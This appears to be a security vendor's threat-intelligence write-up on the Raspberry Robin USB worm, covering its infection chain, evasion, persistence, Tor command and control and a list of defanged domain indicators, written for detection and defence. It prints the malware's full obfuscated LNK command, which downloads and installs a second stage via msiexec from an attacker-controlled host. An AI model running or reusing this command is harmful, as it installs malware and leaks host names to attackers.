Resurgent USB Malware: Battling Raspberry Robin
SenseOn has investigated a recent Raspberry Robin infection as part of our threat intelligence efforts.
In this article, our cybersecurity analyst team explores recent findings from this research.
Read on to see how our team leveraged SenseOn’s advanced telemetry to present security researchers and professionals with a new level of insight into the Raspberry Robin attack chain.
The Raspberry Robin Worm
First spotted in the wild in 2021, Raspberry Robin is a type of worm-like malware replicating itself through removable USB flash drives. In Q4 last year, Raspberry Robin was estimated to have compromised over 1,000 organisations per month.
Raspberry Robin infections start through a variety of methods. The most common involves infecting USB drives inserted into computers already infected with Raspberry Robin. Raspberry Robin then creates malicious LNK files (aka shortcuts) on the USB storage device which when clicked downloads a second stage. The second stage of the infection is hosted behind compromised QNAP NAS devices.
After the malware gains persistence it achieves command and control through Tor – it does not immediately attempt financial gain from the compromise itself.
Broader reporting indicates that Raspberry Robin’s operators are an initial access broker who sells remote access to compromised systems to third parties who may launch Cobalt Strike or ransomware strains such as LockBit ransomware.
Initial Access
Raspberry Robin creates shortcuts known as LNK files in the root of USB removable media devices (i.e., a USB stick) connected to infected systems by using a technique identified by MITRE as Replication Through Removable Media (T1091).
The LNK files Raspberry Robin creates often use innocuous icons and names such as Explorer, Report or Update.
The shortcut target is set to open the Windows command line to download and install the second stage. This can occur automatically through an autorun.inf file or through User Execution.
The full target is shown below:
%WIndir%\sySTem32\cmd.EXe /D /v/rS^tA^R^T M^S^i^E^X^E^c e^h^T^y=^E^d -^Q^u^I^eT ^a^xQNK=^R^W^Z -P^a^ckag^E "hTTp[:]//q0[.]Wf:8080/AJyth/oVBh1234eABgjbGZlVdQpfnRJwW//!COmPUTeRName!" D^z^j^g^z=o^Y^z^j^b
In the target above, the LNK file uses the Windows command line to download the second stage via HTTP and install it via MSIExec.
The HTTP request includes the device’s hostname, as shown in the telemetry below.
The user agent seen in the HTTP request to download the second stage is Windows Installer
“. This is an indicator which can be used in other security tooling such as by analysing proxy logs in a traditional SIEM.
QNAP NAS Devices Hosting Second Stage
In every sample we analysed the second stage is always downloaded over HTTP from a server running on port 8080.
We found 36 recently used second-stage servers. Then, by reviewing the host history on Shodan, we established that every host appeared to be a compromised QNAP NAS device.
This is interesting because using compromised QNAP devices as a proxy obscures the actual location for hosting the second stage.
By using a high number of proxies, this obfuscation technique hampers efforts to block the infection chain through common web-based filtering.
Whilst each host could have been accessed via an IP address, the threat actor had registered a domain name for each proxy. We noted significant diversity in the TLDs and registrars used.
Threat Actor Possibly Based In the Americas
SenseOn was able to record and analyse the time of day that command and control domain names were registered. Our team plotted a summary of the activity on the graph below.
Most domains we saw were registered in a timezone consistent with an actor based in The Americas.
Attribution is very difficult in cyber security and this is just an indicator which should be compared with other factors.
Second Stage Execution
The second stage in the infection chain involves an MSI file.
After a long wait of greater than 5 minutes, this file injects itself into explorer. This is a common anti-analysis method to evade sandbox systems.
In the example SenseOn studied, the Raspberry Robin also exhibited debugger evasion and refused to execute in a virtual environment.
We then observed a range of malicious DLLs being loaded and used. The DLL names changed frequently and did not remain static.
The MSI used for the loader and the files used for persistence were heavily packed and encrypted.
These files were appropriately 500MB which may be a method to impair defences as some scanning engines won’t scan large files. Often these files will compress to less than 2MB.
Persistence via RunOnceEx Registry Keys
Persistence is achieved by creating a RunOnceEx Registry Key. RunOnceEx clears the registry key after it is run.
Both the name of the key and the filename are randomly generated.
The file is accessed by the malware constantly. Other processes can’t read it.
Attempts to Open the Firewall
Requests were made to open the firewall via UPnP. The malware may likely attempt to open a socket on the firewall via UPnP.
Command and Control
Command and control is achieved through the Tor network. Connections are made on average once every 60 seconds with a variance of +/- 60 seconds.
All command and control connections are sourced from either dllhost.exe or regsvr32.exe with the parent process of explorer.exe. As the connections go to the Tor network, they can be tough to detect and block using network information alone.
JA3 Fingerprint
The JA3 client fingerprint remained static as Raspberry Robin uses native Windows 10 sockets. This can provide a good pivot point for threat hunting, but it isn’t a high confidence indicator as other applications may use it.
Client Fingerprint
JA3 Hash: c12f54a3f91dc7bafd92cb59fe009a35
Conclusion
Whilst the use of USB storage may be in decline in many industries it is still heavily used in environments with Operational Technology (OT) or poor centralised controls, but malware like Raspberry Robin remains a serious cybersecurity threat.
As our analysis demonstrates, Raspberry Robin is an evasive malware strain that uses multiple layers of obfuscation to evade both static and dynamic analysis, making detection and reversing difficult.
Still, the scope of a compromise can be understood using a combination of network and endpoint telemetry through a tool like SenseOn.
Given time, Raspberry Robin will also pass the infected host to another group who may deploy payloads such as Cobalt Strike or Ransomware. This multiplies the risk it poses to organisations.
As governments take action against ransomware groups we predict a rise in initial access brokers. They can profit by allowing others to take the higher-risk actions of monetising the compromise with ransomware or stealing sensitive data.
IOCs
Eznb[.]net
8t[.]pm
7d[.]rs
Zk[.]qa
27o[.]nl
5g7[.]at
H0[.]pm
1h3[.]me
0j[.]wf
Fgcz[.]net
5ky[.]xyz
0dz[.]me
M0[.]yt
6y[.]re
6xj[.]xyz
J68[.]info
Nt3[.]xyz
Zjc[.]bz
O7car[.]com
03s30[.]com
W0[.]pm
6uy[.]at
e0[.]wf
13j[.]me
Jrx[.]tw
Bcomb[.]net
5qy[.]ro
Jzm[.]pw
W4[.]nz
J5n[.]xyz
0i[.]pm
Vqdn[.]net
5v0[.]nl
N9fz[.]com
Kj1[.]xyz
6qo[.]at
8t[.]wf
Zxn[.]fyi